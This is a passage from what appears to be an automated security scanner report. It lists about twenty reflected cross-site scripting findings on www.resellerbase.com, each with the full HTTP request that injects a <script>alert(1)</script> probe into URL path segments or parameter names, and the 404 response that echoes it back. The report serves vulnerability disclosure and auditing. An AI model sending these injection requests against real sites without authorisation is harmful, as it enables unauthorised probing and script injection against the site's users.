Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaildbfa6<script>alert(1)</script>35cf926256a/5/themes/ was not found on this server.</p>
...[SNIP]...

2.3370. http://www.resellerbase.com/detail/5/themes/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8cb96<script>alert(1)</script>7ae60d572af was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/58cb96<script>alert(1)</script>7ae60d572af/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/58cb96<script>alert(1)</script>7ae60d572af/themes/ was not found on this server.</p>
...[SNIP]...

2.3371. http://www.resellerbase.com/detail/5/themes/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 457d0<script>alert(1)</script>249511c6f5c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes457d0<script>alert(1)</script>249511c6f5c/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes457d0<script>alert(1)</script>249511c6f5c/ was not found on this server.</p>
...[SNIP]...

2.3372. http://www.resellerbase.com/detail/5/themes/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload af13c<script>alert(1)</script>830a83e17fa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/?af13c<script>alert(1)</script>830a83e17fa=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/?af13c<script>alert(1)</script>830a83e17fa=1 was not found on this server.</p>
...[SNIP]...

2.3373. http://www.resellerbase.com/detail/5/themes/kosmos/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c62f5<script>alert(1)</script>225aff60d5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailc62f5<script>alert(1)</script>225aff60d5/5/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailc62f5<script>alert(1)</script>225aff60d5/5/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.3374. http://www.resellerbase.com/detail/5/themes/kosmos/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b23ce<script>alert(1)</script>147bf15d8ff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5b23ce<script>alert(1)</script>147bf15d8ff/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5b23ce<script>alert(1)</script>147bf15d8ff/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.3375. http://www.resellerbase.com/detail/5/themes/kosmos/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a9565<script>alert(1)</script>22526c0dbac was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themesa9565<script>alert(1)</script>22526c0dbac/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themesa9565<script>alert(1)</script>22526c0dbac/kosmos/ was not found on this server.</p>
...[SNIP]...

2.3376. http://www.resellerbase.com/detail/5/themes/kosmos/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b64db<script>alert(1)</script>906746001a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmosb64db<script>alert(1)</script>906746001a/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmosb64db<script>alert(1)</script>906746001a/ was not found on this server.</p>
...[SNIP]...

2.3377. http://www.resellerbase.com/detail/5/themes/kosmos/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2f432<script>alert(1)</script>b3890720e12 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos/?2f432<script>alert(1)</script>b3890720e12=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/?2f432<script>alert(1)</script>b3890720e12=1 was not found on this server.</p>
...[SNIP]...

2.3378. http://www.resellerbase.com/detail/5/themes/kosmos/images/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 83d70<script>alert(1)</script>70e378c3e3f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail83d70<script>alert(1)</script>70e378c3e3f/5/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail83d70<script>alert(1)</script>70e378c3e3f/5/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.3379. http://www.resellerbase.com/detail/5/themes/kosmos/images/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b9b52<script>alert(1)</script>e720ee281e4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5b9b52<script>alert(1)</script>e720ee281e4/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5b9b52<script>alert(1)</script>e720ee281e4/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.3380. http://www.resellerbase.com/detail/5/themes/kosmos/images/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7df5a<script>alert(1)</script>7cedc593218 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes7df5a<script>alert(1)</script>7cedc593218/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes7df5a<script>alert(1)</script>7cedc593218/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.3381. http://www.resellerbase.com/detail/5/themes/kosmos/images/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8008a<script>alert(1)</script>ceee95e7250 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos8008a<script>alert(1)</script>ceee95e7250/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos8008a<script>alert(1)</script>ceee95e7250/images/ was not found on this server.</p>
...[SNIP]...

2.3382. http://www.resellerbase.com/detail/5/themes/kosmos/images/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload bb851<script>alert(1)</script>ecb03dd6f19 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos/imagesbb851<script>alert(1)</script>ecb03dd6f19/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/imagesbb851<script>alert(1)</script>ecb03dd6f19/ was not found on this server.</p>
...[SNIP]...

2.3383. http://www.resellerbase.com/detail/5/themes/kosmos/images/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e0a51<script>alert(1)</script>315b9acf1f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos/images/?e0a51<script>alert(1)</script>315b9acf1f5=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images/?e0a51<script>alert(1)</script>315b9acf1f5=1 was not found on this server.</p>
...[SNIP]...

2.3384. http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e1e2e<script>alert(1)</script>303bb928a53 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaile1e2e<script>alert(1)</script>303bb928a53/5/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaile1e2e<script>alert(1)</script>303bb928a53/5/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3385. http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6812c<script>alert(1)</script>7e94fae8e8d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/56812c<script>alert(1)</script>7e94fae8e8d/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/56812c<script>alert(1)</script>7e94fae8e8d/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3386. http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 79b00<script>alert(1)</script>73db13305ad was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes79b00<script>alert(1)</script>73db13305ad/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes79b00<script>alert(1)</script>73db13305ad/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3387. http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 962a9<script>alert(1)</script>ead5029af7d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos962a9<script>alert(1)</script>ead5029af7d/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos962a9<script>alert(1)</script>ead5029af7d/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3388. http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 13855<script>alert(1)</script>6eb819a3465 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos/images13855<script>alert(1)</script>6eb819a3465/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images13855<script>alert(1)</script>6eb819a3465/rating/ was not found on this server.</p>
...[SNIP]...

2.3389. http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 7ddeb<script>alert(1)</script>11f63f5a680 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos/images/rating7ddeb<script>alert(1)</script>11f63f5a680/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
